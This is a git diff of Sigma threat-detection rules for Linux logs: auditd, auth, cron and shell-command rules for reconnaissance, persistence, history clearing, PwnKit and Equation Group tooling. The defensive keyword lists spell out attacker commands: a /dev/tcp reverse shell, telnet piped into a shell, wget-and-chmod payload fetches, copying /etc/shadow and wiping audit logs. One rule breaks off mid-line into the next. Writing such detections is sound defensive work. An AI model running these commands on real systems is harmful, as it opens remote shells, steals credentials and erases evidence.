https://github.com/Neo23x0/auditd +author: Marie Euler date: 2020/05/18 modified: 2021/11/27 +tags: + - attack.command_and_control logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - key: 'susp_activity' - condition: selection + selection: + key: 'susp_activity' + condition: selection falsepositives: - - Admin or User activity + - Admin or User activity level: medium -tags: - - attack.command_and_control diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_susp_cmds.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_susp_cmds.yml index b8c330a13..2845a12e1 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_susp_cmds.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_susp_cmds.yml @@ -2,35 +2,35 @@ title: Suspicious Commands Linux id: 1543ae20-cbdf-4ec1-8d12-7664d667a825 status: test description: Detects relevant commands often related to malware or hacking activity -author: Florian Roth references: - - Internal Research - mostly derived from exploit code including code in MSF + - Internal Research - mostly derived from exploit code including code in MSF +author: Florian Roth (Nextron Systems) date: 2017/12/12 -modified: 2021/11/27 +modified: 2022/10/05 +tags: + - attack.execution + - attack.t1059.004 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - cmd1: - type: 'EXECVE' - a0: 'chmod' - a1: '777' - cmd2: - type: 'EXECVE' - a0: 'chmod' - a1: 'u+s' - cmd3: - type: 'EXECVE' - a0: 'cp' - a1: '/bin/ksh' - cmd4: - type: 'EXECVE' - a0: 'cp' - a1: '/bin/sh' - condition: 1 of cmd* + cmd1: + type: 'EXECVE' + a0: 'chmod' + a1: 777 + cmd2: + type: 'EXECVE' + a0: 'chmod' + a1: 'u+s' + cmd3: + type: 'EXECVE' + a0: 'cp' + a1: '/bin/ksh' + cmd4: + type: 'EXECVE' + a0: 'cp' + a1: '/bin/sh' + condition: 1 of cmd* falsepositives: - - Admin activity + - Admin activity level: medium -tags: - - attack.execution - - attack.t1059.004 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml index b1cf17ce9..86b4ea4f8 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml @@ -2,43 +2,43 @@ title: Program Executions in Suspicious Folders id: a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc status: test description: Detects program executions in suspicious non-program folders related to malware or hacking activity -author: Florian Roth references: - - Internal Research + - Internal Research +author: Florian Roth (Nextron Systems) date: 2018/01/23 modified: 2021/11/27 +tags: + - attack.t1587 + - attack.t1584 + - attack.resource_development logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: 'SYSCALL' - exe|startswith: + selection: + type: 'SYSCALL' + exe|startswith: # Temporary folder - - '/tmp/' + - '/tmp/' # Web server - - '/var/www/' # Standard - - '/home/*/public_html/' # Per-user - - '/usr/local/apache2/' # Classical Apache - - '/usr/local/httpd/' # Old SuSE Linux 6.* Apache - - '/var/apache/' # Solaris Apache - - '/srv/www/' # SuSE Linux 9.* - - '/home/httpd/html/' # Redhat 6 or older Apache - - '/srv/http/' # ArchLinux standard - - '/usr/share/nginx/html/' # ArchLinux nginx + - '/var/www/' # Standard + - '/home/*/public_html/' # Per-user + - '/usr/local/apache2/' # Classical Apache + - '/usr/local/httpd/' # Old SuSE Linux 6.* Apache + - '/var/apache/' # Solaris Apache + - '/srv/www/' # SuSE Linux 9.* + - '/home/httpd/html/' # Redhat 6 or older Apache + - '/srv/http/' # ArchLinux standard + - '/usr/share/nginx/html/' # ArchLinux nginx # Data dirs of typically exploited services (incomplete list) - - '/var/lib/pgsql/data/' - - '/usr/local/mysql/data/' - - '/var/lib/mysql/' - - '/var/vsftpd/' - - '/etc/bind/' - - '/var/named/' - condition: selection + - '/var/lib/pgsql/data/' + - '/usr/local/mysql/data/' + - '/var/lib/mysql/' + - '/var/vsftpd/' + - '/etc/bind/' + - '/var/named/' + condition: selection falsepositives: - - Admin activity (especially in /tmp folders) - - Crazy web applications + - Admin activity (especially in /tmp folders) + - Crazy web applications level: medium -tags: - - attack.t1587 - - attack.t1584 - - attack.resource_development diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml index 4eaefc716..63c13cebc 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml @@ -1,36 +1,36 @@ -title: 'Suspicious History File Operations' +title: Suspicious History File Operations - Linux id: eae8ce9f-bde9-47a6-8e79-f20d18419910 status: test description: 'Detects commandline operations on shell history files' -author: 'Mikhail Larin, oscd.community' references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md +author: 'Mikhail Larin, oscd.community' date: 2020/10/17 -modified: 2021/11/27 +modified: 2022/11/28 +tags: + - attack.credential_access + - attack.t1552.003 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - execve: - type: EXECVE - history: - - '.bash_history' - - '.zsh_history' - - '.zhistory' - - '.history' - - '.sh_history' - - 'fish_history' - condition: execve and history + execve: + type: EXECVE + history: + - '.bash_history' + - '.zsh_history' + - '.zhistory' + - '.history' + - '.sh_history' + - 'fish_history' + condition: execve and history fields: - - a0 - - a1 - - a2 - - a3 - - key + - a0 + - a1 + - a2 + - a3 + - key falsepositives: - - Legitimate administrative activity - - Legitimate software, cleaning hist file + - Legitimate administrative activity + - Legitimate software, cleaning hist file level: medium -tags: - - attack.credential_access - - attack.t1552.003 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_system_info_discovery.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_system_info_discovery.yml index 223be5b49..40eb3f94a 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_system_info_discovery.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_system_info_discovery.yml @@ -1,31 +1,47 @@ -title: System Information Discovery +title: System Information Discovery - Auditd id: f34047d9-20d3-4e8b-8672-0a35cc50dc71 +status: test description: Detects System Information Discovery commands -author: 'Pawel Mazur' -status: experimental -date: 2021/09/03 references: - - https://attack.mitre.org/techniques/T1082/ - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md + - https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1082/T1082.md +author: Pawel Mazur +date: 2021/09/03 +modified: 2023/03/06 +tags: + - attack.discovery + - attack.t1082 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: PATH - name: - - /etc/lsb-release - - /etc/redhat-release - - /etc/issue - selection2: - type: EXECVE - a0: - - uname - - uptime - condition: selection or selection2 -tags: - - attack.discovery - - attack.t1082 + selection_1: + type: PATH + name: + - /etc/lsb-release + - /etc/redhat-release + - /etc/issue + selection_2: + type: EXECVE + a0: + - uname + - uptime + - lsmod + - hostname + - env + selection_3: + type: EXECVE + a0: grep + a1|contains: + - vbox + - vm + - xen + - virtio + - hv + selection_4: + type: EXECVE + a0: kmod + a1: list + condition: 1 of selection_* falsepositives: - - Legitimate administrative activity + - Likely level: low diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml index dc0f65b67..637b70e2c 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml @@ -1,15 +1,15 @@ -title: System Information Discovery +title: System and Hardware Information Discovery id: 1f358e2e-cb63-43c3-b575-dfb072a6814f related: - id: 42df45e7-e6e9-43b5-8f26-bec5b39cc239 type: derived status: stable description: Detects system information discovery commands +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-4---linux-vm-check-via-hardware author: Ömer Günal, oscd.community date: 2020/10/08 -modified: 2021/09/14 -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md +modified: 2022/11/26 tags: - attack.discovery - attack.t1082 @@ -18,17 +18,17 @@ logsource: service: auditd detection: selection: - type: 'PATH' - name: - - '/sys/class/dmi/id/bios_version' - - '/sys/class/dmi/id/product_name' - - '/sys/class/dmi/id/chassis_vendor' - - '/proc/scsi/scsi' - - '/proc/ide/hd0/model' - - '/proc/version' - - '/etc/*version' - - '/etc/*release' - - '/etc/issue' + type: 'PATH' + name: + - '/sys/class/dmi/id/bios_version' + - '/sys/class/dmi/id/product_name' + - '/sys/class/dmi/id/chassis_vendor' + - '/proc/scsi/scsi' + - '/proc/ide/hd0/model' + - '/proc/version' + - '/etc/*version' + - '/etc/*release' + - '/etc/issue' condition: selection falsepositives: - Legitimate administration activities diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml index 61dfc0fb6..8910fea39 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml @@ -1,33 +1,33 @@ -title: 'System Shutdown/Reboot' +title: System Shutdown/Reboot - Linux id: 4cb57c2f-1f29-41f8-893d-8bed8e1c1d2f status: test -description: 'Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.' -author: 'Igor Fits, oscd.community' +description: Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. references: - - hhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md +author: 'Igor Fits, oscd.community' date: 2020/10/15 -modified: 2021/11/27 +modified: 2022/11/26 +tags: + - attack.impact + - attack.t1529 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - execve: - type: 'EXECVE' - shutdowncmd: - - 'shutdown' - - 'reboot' - - 'halt' - - 'poweroff' - init: - - 'init' - - 'telinit' - initselection: - - '0' - - '6' - condition: execve and (shutdowncmd or (init and initselection)) + execve: + type: 'EXECVE' + shutdowncmd: + - 'shutdown' + - 'reboot' + - 'halt' + - 'poweroff' + init: + - 'init' + - 'telinit' + initselection: + - 0 + - 6 + condition: execve and (shutdowncmd or (init and initselection)) falsepositives: - - Legitimate administrative activity + - Legitimate administrative activity level: informational -tags: - - attack.impact - - attack.t1529 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_systemd_service_creation.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_systemd_service_creation.yml index 96bfcc8be..e856859f3 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_systemd_service_creation.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_systemd_service_creation.yml @@ -1,30 +1,29 @@ title: Systemd Service Creation id: 1bac86ba-41aa-4f62-9d6b-405eac99b485 -status: experimental +status: test description: Detects a creation of systemd services which could be used by adversaries to execute malicious code. -author: 'Pawel Mazur' references: - - https://attack.mitre.org/techniques/T1543/002/ - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md +author: 'Pawel Mazur' date: 2022/02/03 modified: 2022/02/06 +tags: + - attack.persistence + - attack.t1543.002 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - path: - type: 'PATH' - nametype: 'CREATE' - name_1: - name|startswith: - - '/usr/lib/systemd/system/' - - '/etc/systemd/system/' - name_2: - name|contains: '/.config/systemd/user/' - condition: path and 1 of name_* + path: + type: 'PATH' + nametype: 'CREATE' + name_1: + name|startswith: + - '/usr/lib/systemd/system/' + - '/etc/systemd/system/' + name_2: + name|contains: '/.config/systemd/user/' + condition: path and 1 of name_* falsepositives: - - Admin work like legit service installs. + - Admin work like legit service installs. level: medium -tags: - - attack.persistence - - attack.t1543.002 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_unix_shell_configuration_modification.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_unix_shell_configuration_modification.yml new file mode 100644 index 000000000..5c76b3f5b --- /dev/null +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_unix_shell_configuration_modification.yml @@ -0,0 +1,53 @@ +title: Unix Shell Configuration Modification +id: a94cdd87-6c54-4678-a6cc-2814ffe5a13d +related: + - id: e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9 + type: obsoletes +status: test +description: Detect unix shell configuration modification. Adversaries may establish persistence through executing malicious commands triggered when a new shell is opened. +references: + - https://objective-see.org/blog/blog_0x68.html + - https://www.glitch-cat.com/p/green-lambert-and-attack + - https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat +author: Peter Matkovski, IAI +date: 2023/03/06 +modified: 2023/03/15 +tags: + - attack.persistence + - attack.t1546.004 +logsource: + product: linux + service: auditd +detection: + selection: + type: 'PATH' + name: + - '/etc/shells' + - '/etc/profile' + - '/etc/profile.d/*' + - '/etc/bash.bashrc' + - '/etc/bashrc' + - '/etc/zsh/zprofile' + - '/etc/zsh/zshrc' + - '/etc/zsh/zlogin' + - '/etc/zsh/zlogout' + - '/etc/csh.cshrc' + - '/etc/csh.login' + - '/root/.bashrc' + - '/root/.bash_profile' + - '/root/.profile' + - '/root/.zshrc' + - '/root/.zprofile' + - '/home/*/.bashrc' + - '/home/*/.zshrc' + - '/home/*/.bash_profile' + - '/home/*/.zprofile' + - '/home/*/.profile' + - '/home/*/.bash_login' + - '/home/*/.bash_logout' + - '/home/*/.zlogin' + - '/home/*/.zlogout' + condition: selection +falsepositives: + - Admin or User activity are expected to generate some false positives +level: medium diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml index 6673e20bf..6509ff29d 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml @@ -1,27 +1,27 @@ title: Steganography Unzip Hidden Information From Picture File id: edd595d7-7895-4fa7-acb3-85a18a8772ca +status: test description: Detects extracting of zip file from image file +references: + - https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/ author: 'Pawel Mazur' -status: experimental date: 2021/09/09 -references: - - https://attack.mitre.org/techniques/T1027/003/ - - https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/ +modified: 2022/10/09 tags: - - attack.defense_evasion - - attack.t1027.003 -falsepositives: - - Unknown -level: low + - attack.defense_evasion + - attack.t1027.003 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - commands: - type: EXECVE - a0: unzip - a1: - a1|endswith: - - '.jpg' - - '.png' - condition: commands and a1 + commands: + type: EXECVE + a0: unzip + a1: + a1|endswith: + - '.jpg' + - '.png' + condition: commands and a1 +falsepositives: + - Unknown +level: low diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_user_discovery.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_user_discovery.yml index 6526a061d..2468ebdf0 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_user_discovery.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_user_discovery.yml @@ -2,25 +2,25 @@ title: System Owner or User Discovery id: 9a0d8ca0-2385-4020-b6c6-cb6153ca56f3 status: test description: Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. -author: Timur Zinniatullin, oscd.community references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md +author: Timur Zinniatullin, oscd.community date: 2019/10/21 modified: 2021/11/27 +tags: + - attack.discovery + - attack.t1033 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: 'EXECVE' - a0: - - 'users' - - 'w' - - 'who' - condition: selection + selection: + type: 'EXECVE' + a0: + - 'users' + - 'w' + - 'who' + condition: selection falsepositives: - - Admin activity + - Admin activity level: low -tags: - - attack.discovery - - attack.t1033 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_web_rce.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_web_rce.yml index f9402ce14..047a72c20 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_web_rce.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_web_rce.yml @@ -1,17 +1,24 @@ title: Webshell Remote Command Execution id: c0d3734d-330f-4a03-aae2-65dacc6a8222 -status: experimental +status: test description: Detects possible command execution by web application/web shell +references: + - Personal Experience of the Author author: Ilyas Ochkov, Beyu Denis, oscd.community date: 2019/10/12 -modified: 2021/11/11 -references: - - personal experience +modified: 2022/12/25 +tags: + - attack.persistence + - attack.t1505.003 logsource: product: linux service: auditd detection: selection: + # You need to add to the following rules to your auditd.conf config: + # -a always,exit -F arch=b32 -S execve -F euid=33 -k detect_execve_www + # -a always,exit -F arch=b64 -S execve -F euid=33 -k detect_execve_www + # Change the number "33" to the ID of your WebServer user. Default: www-data:x:33:33 type: 'SYSCALL' syscall: 'execve' key: 'detect_execve_www' @@ -20,6 +27,3 @@ falsepositives: - Admin activity - Crazy web applications level: critical -tags: - - attack.persistence - - attack.t1505.003 diff --git a/src/main/resources/rules/linux/builtin/auth/lnx_auth_pwnkit_local_privilege_escalation.yml b/src/main/resources/rules/linux/builtin/auth/lnx_auth_pwnkit_local_privilege_escalation.yml new file mode 100644 index 000000000..27829b539 --- /dev/null +++ b/src/main/resources/rules/linux/builtin/auth/lnx_auth_pwnkit_local_privilege_escalation.yml @@ -0,0 +1,25 @@ +title: PwnKit Local Privilege Escalation +id: 0506a799-698b-43b4-85a1-ac4c84c720e9 +status: test +description: Detects potential PwnKit exploitation CVE-2021-4034 in auth logs +references: + - https://twitter.com/wdormann/status/1486161836961579020 +author: Sreeman +date: 2022/01/26 +modified: 2023/01/23 +tags: + - attack.privilege_escalation + - attack.t1548.001 +logsource: + product: linux + service: auth +detection: + keywords: + '|all': + - 'pkexec' + - 'The value for environment variable XAUTHORITY contains suscipious content' + - '[USER=root] [TTY=/dev/pts/0]' + condition: keywords +falsepositives: + - Unknown +level: high diff --git a/src/main/resources/rules/linux/other/lnx_clamav.yml b/src/main/resources/rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml similarity index 76% rename from src/main/resources/rules/linux/other/lnx_clamav.yml rename to src/main/resources/rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml index a4f6cec6e..43da1ba42 100644 --- a/src/main/resources/rules/linux/other/lnx_clamav.yml +++ b/src/main/resources/rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml @@ -2,10 +2,13 @@ title: Relevant ClamAV Message id: 36aa86ca-fd9d-4456-814e-d3b1b8e1e0bb status: stable description: Detects relevant ClamAV messages -author: Florian Roth -date: 2017/03/01 references: - - https://github.com/ossec/ossec-hids/blob/master/etc/rules/clam_av_rules.xml + - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml +author: Florian Roth (Nextron Systems) +date: 2017/03/01 +tags: + - attack.resource_development + - attack.t1588.001 logsource: product: linux service: clamav @@ -20,6 +23,3 @@ detection: falsepositives: - Unknown level: high -tags: - - attack.resource_development - - attack.t1588.001 diff --git a/src/main/resources/rules/linux/builtin/lnx_crontab_file_modification.yml b/src/main/resources/rules/linux/builtin/cron/lnx_cron_crontab_file_modification.yml similarity index 54% rename from src/main/resources/rules/linux/builtin/lnx_crontab_file_modification.yml rename to src/main/resources/rules/linux/builtin/cron/lnx_cron_crontab_file_modification.yml index dc5bde7ba..fc07550d2 100644 --- a/src/main/resources/rules/linux/builtin/lnx_crontab_file_modification.yml +++ b/src/main/resources/rules/linux/builtin/cron/lnx_cron_crontab_file_modification.yml @@ -1,12 +1,14 @@ title: Modifying Crontab id: af202fd3-7bff-4212-a25a-fb34606cfcbe -status: experimental +status: test description: Detects suspicious modification of crontab file. -# log example: Apr 16 11:18:18 localhost CROND[3333]: (user) REPLACE (user) -author: Pawel Mazur references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md +author: Pawel Mazur date: 2022/04/16 +tags: + - attack.persistence + - attack.t1053.003 logsource: product: linux service: cron @@ -15,8 +17,5 @@ detection: - 'REPLACE' condition: keywords falsepositives: - - Legitimate modification of crontab + - Legitimate modification of crontab level: medium -tags: - - attack.persistence - - attack.t1053.003 diff --git a/src/main/resources/rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml b/src/main/resources/rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml new file mode 100644 index 000000000..616740cba --- /dev/null +++ b/src/main/resources/rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml @@ -0,0 +1,22 @@ +title: Guacamole Two Users Sharing Session Anomaly +id: 1edd77db-0669-4fef-9598-165bda82826d +status: test +description: Detects suspicious session with two users present +references: + - https://research.checkpoint.com/2020/apache-guacamole-rce/ +author: Florian Roth (Nextron Systems) +date: 2020/07/03 +modified: 2021/11/27 +tags: + - attack.credential_access + - attack.t1212 +logsource: + product: linux + service: guacamole +detection: + selection: + - '(2 users now present)' + condition: selection +falsepositives: + - Unknown +level: high diff --git a/src/main/resources/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml b/src/main/resources/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml new file mode 100644 index 000000000..3022534da --- /dev/null +++ b/src/main/resources/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml @@ -0,0 +1,82 @@ +title: Equation Group Indicators +id: 41e5c73d-9983-4b69-bd03-e13b67e9623c +status: test +description: Detects suspicious shell commands used in various Equation Group scripts and tools +references: + - https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1 +author: Florian Roth (Nextron Systems) +date: 2017/04/09 +modified: 2021/11/27 +tags: + - attack.execution + - attack.g0020 + - attack.t1059.004 +logsource: + product: linux +detection: + keywords: + # evolvingstrategy, elgingamble, estesfox + - 'chown root*chmod 4777 ' + - 'cp /bin/sh .;chown' + # tmpwatch + - 'chmod 4777 /tmp/.scsi/dev/bin/gsh' + - 'chown root:root /tmp/.scsi/dev/bin/' + # estesfox + - 'chown root:root x;' + # ratload + - '/bin/telnet locip locport < /dev/console | /bin/sh' + - '/tmp/ratload' + # ewok + - 'ewok -t ' + # xspy + - 'xspy -display ' + # elatedmonkey + - 'cat > /dev/tcp/127.0.0.1/80 < /dev/null' + # noclient + - 'ping -c 2 *; grep * /proc/net/arp >/tmp/gx' + - 'iptables * OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP;' + # auditcleaner + - '> /var/log/audit/audit.log; rm -f .' + - 'cp /var/log/audit/audit.log .tmp' + # reverse shell + - 'sh >/dev/tcp/* <&1 2>&1' + # packrat + - 'ncat -vv -l -p * <' + - 'nc -vv -l -p * <' + # empty bowl + - '< /dev/console | uudecode && uncompress' + - 'sendmail -osendmail;chmod +x sendmail' + # echowrecker + - '/usr/bin/wget -O /tmp/a http* && chmod 755 /tmp/cron' + # dubmoat + - 'chmod 666 /var/run/utmp~' + # poptop + - 'chmod 700 nscd crond' + # abopscript + - 'cp /etc/shadow /tmp/.' + # ys + - ' /dev/null 2>&1 && uncompress' + # jacktelnet + - 'chmod 700 jp&&netstat -an|grep' + # others + - 'uudecode > /dev/null 2>&1 && uncompress -f * && chmod 755' + - 'chmod 700 crond' + - 'wget http*; chmod +x /tmp/sendmail' + - 'chmod 700 fp sendmail pt' + - 'chmod 755 /usr/vmsys/bin/pipe' + - 'chmod -R 755 /usr/vmsys' + - 'chmod 755 $opbin/*tunnel' + - 'chmod 700 sendmail' + - 'chmod 0700 sendmail' + - '/usr/bin/wget http*sendmail;chmod +x sendmail;' + - '&& telnet * 2>&1 .bash_history" to clear the history and this is not one the commands listed here. We can't be exhaustive for all the possibilities ! - # - the method suggested by Patrick Bareiss logs all the commands entered directly in a bash shell. therefore it may miss some events (for instance it doesn't log the commands launched from a Caldera agent). Here if .bash_history is cleared, it will always be detected +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md + - https://www.hackers-arise.com/post/2016/06/20/covering-your-bash-shell-tracks-antiforensics author: Patrick Bareiss date: 2019/03/24 -modified: 2021/11/24 -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md - - https://attack.mitre.org/techniques/T1070/003/ - - https://www.hackers-arise.com/single-post/2016/06/20/Covering-your-BASH-Shell-Tracks-AntiForensics +modified: 2022/12/25 +tags: + - attack.defense_evasion + - attack.t1070.003 +# Example config for this one (place it in .bash_profile): +# (is_empty=false; inotifywait -m .bash_history | while read file; do if [ $(wc -l <.bash_history) -lt 1 ]; then if [ "$is_empty" = false ]; then logger -i -p local5.info -t empty_bash_history "$USER : ~/.bash_history is empty "; is_empty=true; fi; else is_empty=false; fi; done ) & +# It monitors the size of .bash_history and log the words "empty_bash_history" whenever a previously not empty bash_history becomes empty +# We define an empty file as a document with 0 or 1 lines (it can be a line with only one space character for example) +# It has two advantages over the version suggested by Patrick Bareiss : +# - it is not relative to the exact command used to clear .bash_history : for instance Caldera uses "> .bash_history" to clear the history and this is not one the commands listed here. We can't be exhaustive for all the possibilities ! +# - the method suggested by Patrick Bareiss logs all the commands entered directly in a bash shell. therefore it may miss some events (for instance it doesn't log the commands launched from a Caldera agent). Here if .bash_history is cleared, it will always be detected logsource: product: linux detection: @@ -38,6 +40,3 @@ detection: falsepositives: - Unknown level: high -tags: - - attack.defense_evasion - - attack.t1070.003 diff --git a/src/main/resources/rules/linux/builtin/lnx_shell_priv_esc_prep.yml b/src/main/resources/rules/linux/builtin/lnx_shell_priv_esc_prep.yml deleted file mode 100644 index d447ec8de..000000000 --- a/src/main/resources/rules/linux/builtin/lnx_shell_priv_esc_prep.yml +++ /dev/null @@ -1,71 +0,0 @@ -title: Privilege Escalation Preparation -id: 444ade84-c362-4260-b1f3-e45e20e1a905 -status: test -description: Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. -author: Patrick Bareiss -references: - - https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ - - https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/ -date: 2019/04/05 -modified: 2021/11/27 -logsource: - product: linux -detection: - keywords: - # distribution type and kernel version - - 'cat /etc/issue' - - 'cat /etc/*-release' - - 'cat /proc/version' - - 'uname -a' - - 'uname -mrs' - - 'rpm -q kernel' - - 'dmesg | grep Linux' - - 'ls /boot | grep vmlinuz-' - # environment variables - - 'cat /etc/profile' - - 'cat /etc/bashrc' - - 'cat ~/.bash_profile' - - 'cat ~/.bashrc' - - 'cat ~/.bash_logout' - # applications and services as root - - 'ps -aux | grep root' - - 'ps -ef | grep root' - # scheduled tasks - - 'crontab -l' - - 'cat /etc/cron*' - - 'cat /etc/cron.allow' - - 'cat /etc/cron.deny' - - 'cat /etc/crontab' - # search for plain text user/passwords - - 'grep -i user *' - - 'grep -i pass *' - # networking - - 'ifconfig' - - 'cat /etc/network/interfaces' - - 'cat /etc/sysconfig/network' - - 'cat /etc/resolv.conf' - - 'cat /etc/networks' - - 'iptables -L' - - 'lsof -i' - - 'netstat -antup' - - 'netstat -antpx' - - 'netstat -tulpn' - - 'arp -e' - - 'route' - # sensitive files - - 'cat /etc/passwd' - - 'cat /etc/group' - - 'cat /etc/shadow' - # sticky bits - - 'find / -perm -u=s' - - 'find / -perm -g=s' - - 'find / -perm -4000' - - 'find / -perm -2000' - timeframe: 30m - condition: keywords -falsepositives: - - Troubleshooting on Linux Machines -level: medium -tags: - - attack.execution - - attack.t1059.004 diff --git a/src/main/resources/rules/linux/builtin/lnx_shell_susp_commands.yml b/src/main/resources/rules/linux/builtin/lnx_shell_susp_commands.yml index 4c8a64463..dc901ee3b 100644 --- a/src/main/resources/rules/linux/builtin/lnx_shell_susp_commands.yml +++ b/src/main/resources/rules/linux/builtin/lnx_shell_susp_commands.yml @@ -2,58 +2,58 @@ title: Suspicious Activity in Shell Commands id: 2aa1440c-9ae9-4d92-84a7-a9e5f5e31695 status: test description: Detects suspicious shell commands used in various exploit codes (see references) -author: Florian Roth references: - - http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html - - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb#L121 - - http://pastebin.com/FtygZ1cg - - https://artkond.com/2017/03/23/pivoting-guide/ + - https://web.archive.org/web/20170319121015/http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html + - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb + - 